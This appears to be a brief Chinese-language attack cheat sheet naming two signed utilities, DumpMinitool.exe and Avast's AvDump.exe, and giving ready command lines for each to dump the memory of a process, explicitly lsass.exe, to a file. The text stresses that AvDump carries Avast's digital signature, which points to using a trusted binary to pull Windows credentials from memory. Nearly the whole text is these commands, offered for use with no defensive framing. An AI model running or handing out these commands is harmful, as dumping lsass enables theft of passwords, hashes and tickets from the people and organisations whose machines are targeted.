工具

DumpMinitool.exe
avdump.exe
AvDump.exe是Avast杀毒软件中自带的一个程序，可用于转储指定进程（lsass.exe）内存数据，它带有Avast杀软数字签名。

方式一

DumpMinitool.exe —file 1.txt —processId 980 —dumpType Full

方式二

AvDump.exe —pid 980 —exception_ptr 0 —thread_id 0 —dump_level 1 —dump_file lsass.dmp